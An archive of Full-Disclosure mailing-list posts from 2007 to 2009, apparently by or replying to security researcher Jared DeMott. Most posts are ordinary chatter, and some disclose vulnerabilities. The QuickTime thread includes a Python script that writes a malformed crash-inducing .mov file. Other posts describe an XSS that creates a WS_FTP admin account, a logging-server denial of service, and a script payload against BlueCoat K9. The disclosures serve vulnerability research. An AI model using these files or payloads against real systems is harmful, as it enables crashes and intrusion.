Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
Freddie Vicious wrote: Microsoft has released Internet Explorer 8 on March 19, 2009 and up to now there's no reliable method to exploit memory corruption vulnerabilities on it? I mean, on IE6 and IE7 we had SkyLined heap spray technique, first seen in the IFRAME overflow exploit [1] which have been used by almost every IE memory corruption exploit so far. Internet Explorer 8 was enhanced with DEP and ASLR protections, making heap spray useless. Then Mark Dowd and Alexander Sotirov published their great paper - Bypassing Browser Memory Protections [2] providing some excellent techniques, mainly the .NET binary technique which bypasses DEP and ASLR which was used by Nils on the latest Pwn2Own to own Internet Explorer 8 RC (Release Candidate) [3] and was used to mass-exploit other vulnerabilities [4]. One day after Nils owned IE8RC, Microsoft released Internet Explorer 8 RTM and blocked the option to load .NET DLL’s from Internet zone and Restricted sites zone. Due to the fact that most of IE exploitation doesn’t occur in Intranet/Trusted sites/Local machine zone, this makes the .NET DLL technique irrelevant most of the times. So my question is - Is there no reliable method to exploit memory corruption vulnerabilities in Internet Explorer 8? I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved. [1] http://milw0rm.com/exploits/612 [2] http://taossa.com/archive/bh08sotirovdowd.pdf [3] http://dvlabs.tippingpoint.com/blog/2009/03/18/pwn2own-2009-day-1---safari-internet-explorer-and-firefox-taken-down-by-four-zero-day-exploits [4] http://milw0rm.com/exploits/8969 -- Best wishes, Freddie Vicious -- __ Jared D. DeMott Principal Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HaXor and Developer training
Well, it's starting to get cold already this year up in Michigan... Thank goodness for ToorCon! I always look forward to warm San Diego in October. Every year I've been to the conference it seems to get better, and may I suggest you check out one of the awesome workshops too. :) The complete line-up for the AppSec class can be found here: http://www.vdalabs.com/tools/2_day_AppSec_syllabus.pdf Cheers, Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WinAppDbg version 1.2 is out!
Mario Alejandro Vilas Jerez wrote: What is WinAppDbg? == The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. Can you compare/contrast with pydbg so I can understand why I might want to give it a try? Do you have a fuzzing platform like Sulley for it as well? Thx! Jared It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes. Current features also include disassembling x86 native code (using the open source diStorm project, see http://ragestorm.net/distorm/), debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing. Where can I find WinAppDbg? === The WinAppDbg project is currently hosted at Sourceforge, and can be found at: http://winappdbg.sourceforge.net/ It's also hosted at the Python Package Index (PyPi): http://pypi.python.org/pypi/winappdbg/1.2 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple QuickTime 0day
Excellent. Doesn't trigger on Mac. I just did a talk on QuickTime hacking at ShakaCon III -- which btw -- can I just say best place for a con ever!. My slides are at www.vdalabs.com. The slides might give you some insight into the types of exceptions you're hoping for. To boil it down, a tool like !exploitable is nice since it could be used to bin crashes into read exception or write exception (the type you're looking for). Oh, and by the way, you can't really call a crash an 0day. I called them 0day crashes in my talk, just to be clear. Blessings, Jared webDEViL wrote: Try it with your latest quicktime player. -- #0:000 !exploitable -v #HostMachine\HostUser #Executing Processor Architecture is x86 #Debuggee is in User Mode #Debuggee is a live user mode debugging session on the local machine #Event Type: Exception #Exception Faulting Address: 0x66830f9b #First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD) # #Faulting Instruction:66830f9b push ebx # #Basic Block: #66830f9b push ebx # Tainted Input Operands: ebx #66830f9c push ebp #66830f9d mov ebp,dword ptr unloaded_papi.dll+0x41f (0420)[esp] #66830fa4 push esi #66830fa5 push edi #66830fa6 mov edi,ecx #66830fa8 cmp edi,offset unloaded_papi.dll+0x5ff (0600) #66830fae mov ebx,edx #66830fb0 mov dword ptr [esp+14h],eax #66830fb4 mov byte ptr [esp+10h],0 #66830fb9 mov byte ptr [esp+11h],0 #66830fbe mov byte ptr [esp+12h],0 #66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4) # #Exception Hash (Major/Minor): 0x614b6671.0x614b786e # #Stack Trace: #QuickTime!DllMain+0x2fabb #Unloaded_papi.dll+0x1231137 #Instruction Address: 0x66830f9b # #Description: Stack Overflow #Short Description: StackOverflow #Exploitability Classification: UNKNOWN #Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e) print -- print w3bd3vil [at] gmail [dot] com print Apple QuickTime CRGN Atom 0day print -- bytes = [ 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ] f = open(webDEViL.mov, wb) for byte in bytes: f.write(%c % byte) f.close() print webDEViL.mov created! (%d bytes) % len(bytes) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Whitepaper
Jeffrey Walton wrote: Hi Jared, Regarding 'The Digital Examination Process: Closing Gaps with New Technology',et al. From the page: This paper introduces new technology called Crucial Vision that addresses this widespread need. It seems to me that if Crucial Security wants to reach the widest audience with its revolutionary technology, the company would simply publish the paper(s) rather than try and mine the data with a 'Request Resource'. You've got the wrong paper, mine is entitled: '*Introduction to Application Security'* Jeff On 5/28/09, Jared DeMott jdem...@crucialsecurity.com wrote: Hi all, If you plan to take my Application Security: For Hackers and Developers at ShakaCon, BlackHat, ToorCon, and others; I finally got off my can and finished the prerequisite white paper. It can be found here: http://www.crucialsecurity.com/index.php?option=com_contenttask=viewid=94Itemid=136 Blessings, Jared -- __ Jared D. DeMott Senior Security Researcher Crucial Security Business Area Harris Corporation http://crucialsecurity.com Office 616.874.7810 Mobile 571.283.4163 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Whitepaper
Hi all, If you plan to take my Application Security: For Hackers and Developers at ShakaCon, BlackHat, ToorCon, and others; I finally got off my can and finished the prerequisite white paper. It can be found here: http://www.crucialsecurity.com/index.php?option=com_contenttask=viewid=94Itemid=136 Blessings, Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bat signal.
Robin responding. Holy email list batman, it's a false alarm! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Penetration testing will be dead by 2009 - Mr. Chess
James Matthews wrote: I wish! Fortify software has been tested against many open source projects and reported a bunch of false positives. Yes i know they are working to improve the software However i still hold that fuzzing will show you some issues that this software cannot. James And if you're unsure if that's true ... just look to the iron chef fuzzing preso from this years blackhat ... fuzzing managed to find a better bug, though both approaches (static and dynamic) found a decent bug in the software under test. Happy New Year! Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Merry Christmas
KammyDoe wrote: Merry Christmas, FD! It's been a fun year; here's to '09! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ And may God bless you! :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What Christianity means to me
Intelligence and religion shouldn't be in the same sentence. To even pretend, yet alone believe, that some pathetic moron has an insight in to the mindset of a celestial dictator is ridiculous. Religion may have been a foolish first attempt at science, but the fact that it still has a place in modern times where science explains so much shows how subservient people want to be. I couldn't disagree more. Here's one small example of how I feel about such things: http://www.bridgewaycommunity.org/podcast/Sermon110908.mp3 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] die
James Matthews wrote: Double Die Gang, telling people to die is not nice. Please refer to [1] or [2]. [1] http://www.elliottsamazing.com/kindergarden.html [2] http://en.wikipedia.org/wiki/Ethic_of_reciprocity ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Kaminsky DNS bug leaked
Alexander Sotirov wrote: Dino Dai Zovi finally spilled the beans: http://twitter.com/dinodaizovi/statuses/858981957 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ That's some funny crap. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] bloginfosec.com: We're looking for a few good columnists!
Kurt Dillard wrote: How much do you pay? We were all wondering but didn't have the gull to ask! lol. smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] We've shut down the Exploit Acquisition Program
Simon Smith wrote: If you're interested you can read about it here: http://snosoft.blogspot.com/2008/03/exploit-acquisition-program-shut-down.html Ya, I'll second that one. The market turned out to be uglier than expected for a lot of reasons including this one. Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hackers are having a positive influence on the world
http://www.hackersforcharity.org/ Join the fun! Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] in Memory of Dude VanWinkle / Justin Plazzo
We all work so hard, and when we die - we have nothing to take with us. None of the praises are going to help Justin or his family now. He is missed and missed forever! I fear eternal life now. Reminds me of 911 in a way. People get so caught up in this Matrix like life ... we forget about what's real and what's just bus-i-ness. If Dude were here now, what advice do you think he'd give now (after discovering eternal truths)? Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Ipswitch FTP XSS leads to FTP server compromise
VDA Labs Advisory: -- Ipswitch FTP XSS leads to FTP server compromise. The Vendor has been notified, and given the PoC. Synopsis: There is XSS vulnerability when the WS_FTP server logs client FTP commands. All user commands are logged. When the FTP command is invalid (error), special characters are converted to HTML chars ( = lt;, = gt;), and logged. However, when the FTP command is valid, there is no sanity check. Thus, it is possible to inject HTML and Javascript into the log file. The WS_FTP administration interface (IIS web application written in ASP) has a view log option. When logs are viewed, it is possible to steal the administrator cookie, or even better, DIRECTLY create a new user (or admin) account for FTP server. We've created a little PoC that will create a new system administrator account when the admin view logs. The PoC is simple and injects an iframe that leads to another html file that creates the new account. Discovered by: -- John Harwold, VDA Labs, LLC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Security Advisory] Backdoor Discovered in Immunity Debugger
Dave, is any of this true? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Right, or wrong?
All: So, I've tried the vendor pay model for bug hunting and it wasn't always well received. Apparently auction sites and 3 party purchasers are fine, but some folks don't like the idea of selling directly to the vendor. I was thinking that this would be ideal since the vendor would have the most interest in knowing about/fixing the bug. My question to the list is this: Is it morally right, wrong, don't know, don't care, good business, bad business, etc.? Either way we're moving away from that model, but I was just curious how others on FD see it. Blessings, Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] LinkedIn 0day
For the full advisory and PoC, see: http://www.vdalabs.com/tools/linkedin.html Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Help with education
Михал Потапыч wrote: If these are the kind of questions you ask then perhaps you should reconsider your decision. don't listen bro, there will always be nah-sayers when you're dreaming big. like i said offline, go for it! jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IPSwitch WS_FTP Logging Server Remote Denial of Service -- a VDA Labs, LLC discovery
IPSwitch WS_FTP Logging Server Remote Denial of Service Version: 7.5.29.0 (Logsrv.exe) Overview The WS FTP logging server is a daemon that listens on UDP port 5151 and is shipped with WS FTP and by default is turned on and used by the local WS FTP instance. It binds to the public IP address of the server and is accessible externally, in part so that other WS FTP machines are able to use it as a logging interface. Description of Crash WS FTP uses a binary protocol to speak to the logging daemon, and each transmission begins with a two byte header 0xab 0xaa. If using a long string of characters to mangle the remaining portions of the message, a pointer operation fails at: 0x00401769 cmp word ptr [ecx], 0AAADh jnz short loc_401787 This crashes the process. By flipping two bytes immediately after the two primary header bytes, you are also able to control where the dereferencing address is at the time of the crash. However, this does not appear to allow code execution on the remote host as the address referenced is too far away from any user supplied input. Discovered By Justin Seitz of VDA Labs LLC ([EMAIL PROTECTED]) Full advisory and attack code location: http://www.vdalabs.com/resources http://www.vdalabs.com/tools/ipswitch.html ipswitchlogsrv-killer.py - Change the IP and PORT numbers as necessary at the top of the file. There are two bytes that lead to different address offsets where the pointer dereference is attempted. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Updated versions of EFS and GPF
Are available here: http://www.vdalabs.com/resources Thanks, Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Month of Random Hashes: DAY SIXTEEN
Month of Random Hashes wrote: [ITEM #1] md5: 27cd1bb8a6b93c061fb0ad38031ca33d sha1: 41b1f79e2f5a53ff182d03ca3fc00644a1173e4c sha256: 0fba5450776398db658ca16d9b45e20e218d3f514d800586bf6778bcbb3d3088 Do I need to send out another hash of my ash to make this nonsense stop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Month of Random Hashes: DAY SIXTEEN
Month of Random Hashes wrote: FAQ coming soon. Please be patient. ok, just having a little fun. Go ahead. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
Month of Random Hashes wrote: [ITEM #1] == my hinney sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398 Took a picture of my backend and would like to post the hash. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
Dr. Neal Krawetz PhD wrote: Send it over here. The picture, not the hash. I have the technologies to determine whether the image is computer generated, digitally altered, or legitimately a real picture! These technologies shall be unveiled at Blackhat during my presentation. Sometimes it is difficult to determine which asses are real in this facade that is the computer security world. - doc neal http://www.hackerfactor.com/blog/ ps: if time provides during my speech, I will discuss the many difficulties I have experienced as a computer security consultant while attempting to have fake myspace accounts shut down for my clients! hahahahahahha. believe me, no one really wants to see it! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Office 0day
Kradorex Xeron wrote: On Sunday 24 June 2007 16:19, [EMAIL PROTECTED] wrote: I can't give detail here Isn't this list called full-disclosure? - in otherwords: If you aren't going to disclose anything: DON'T post that you have something. This list is designed specifically for disclosing (and discussing on the occasion) vulnerabilities, problems, etc to the entire community at once, not just selectively who you choose (i.e. who buys your 0day). Finding good buyers is tricky. There is a market for bug selling, but you've got to be well connected. Jared :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Office 0day
secure poon wrote: *Proposition* Microsoft is a 280+ billion dollar corporation. Why don't/can't they have a standard ransom fee for security flaws? 0day Remote OS flaw: $1,000,000 0day IE explorer flaws that give administrative shells: $200,000 0day (other flaws) that affect other products (ie office): $200,000 etc..(these fees could be much higher) Provided the person who discovered the vulnerability gives a full working patch, Then Microsoft could patch the hole right away and people could update. (yes i know lots of people don't update but at least it is a start, and then legally they would be so liable). Maybe this concept isint new and I am just in the dark about it. *Question* ** Why does'nt Microsoft (or any company) do this? And also has Microsoft ever been held criminaly liable for negligence in a criminal case for not patching a flaw leading to a security breach? Or is there team of lawyers just to much for any normal person? All I can say is AMEN. Having to sell to TPs, iDefs, and Nation States is so much more painful. Jared :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Oday release
What is funny however, is that Microsoft, the great supporter of responsible disclosure actually is the main sponsor (patron) of the SyScan conference: http://syscan.org/ which is organized by Thomas. Maybe it's a sign that Microsoft realized that free responsible disclosure idea is a bit artificial? (at last!) No doubt. Security research is an establishing market. If vendors won't pay to know about their bugs others certainly will. Jared :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CSIS Advisory: BlueCoat K9 Web Protection 3.2.36 Overflow
Dennis Rand wrote: CSIS Security Group has discovered a remote exploitable arbitrary overwrite, in the Blue Coat K9 Web Protection local Web configuration manager on 127.0.0.1 and port 2372. Justin Seitz of VDA Labs (www.vdalabs.com) already found this bug. Here's the CVE: CVE-2007-1783. They had so many bugs, they're rolling this issue and more into the next release. We have a working PoC, and believe it could be transformed into remote via embedded link. For example: SCRIPT SRC=http://127.0.0.1:2372/buffer here http://127.0.0.1:2372/AAA/SCRIPT Blessings, Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CSIS Advisory: BlueCoat K9 Web Protection 3.2.36 Overflow
Dennis Rand wrote: Hey Jared It does not matter when what was discovered as long as it got fixed J It does if you're in the bug reselling business. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] About the Post: Exciting new Paimei release!
This message concerns the below post. In case it isn't obvious, this isn't the real Pedram. We're not sure who or why. Blessings, Jared I am excited to see Jared DeMott's recent post to Dailydave with his release of the Evolutionary Fuzzing System! A highly exciting and revolutionary (or is it EVOLUTIONARY!?) new fuzzing system designed for automatic discovery of protocols. A much exciting concept that I will have to write about in my new book! Also included in this release is code previously only private to my copy of Paimei! Previously, all remote debugging functionality was reserved for my private copy but apparently Jared DeMott felt the time was right to include pydbg_client class in his EFS release of Paimei! This should allow debuggers of applications to use the remote functionality of Paimei to debug processes running on remote computers. Also the all new pydbg_server, just in this release! These tools should help all of you most greatly. I highly recommend that instead of downloading the latest release of Paimei from openrce.org, you download the efs-paimei package from appliedsec.com, as their package has been updated far in advance of mine. Happy fuzzing, and let the best boundary character overflow! Pedram L. AminiAAA But I return to my previous stack frame from there! NOT TONIGHT YOU DON'T ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [fuzzing] Fuzzled - Perl fuzzing framework
Tim Brown wrote: Having noticed the popularity of fuzzing tools recently, I was feeling a bit left out. Where is the Perl framework to complete the family? With that in mind I've spent the last months working on something that should fill the gap - Fuzzled. Fuzzled is a powerful fuzzing framework. Fuzzled includes helper functions, namespaces, factories which allow a wide variety of fuzzing tools to be developed. Fuzzled comes with several example protocols and drivers for them. Fuzzled v1.0 can be found at http://www.portcullis-security.com/16.php. Cheers, Tim Cool. :) Oh, GPF 4.1 will be up on the ASI website on Monday or Tuesday. No real enhancements, but code was reordered to support further development, and a few minor bug fixes were made. Jared ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/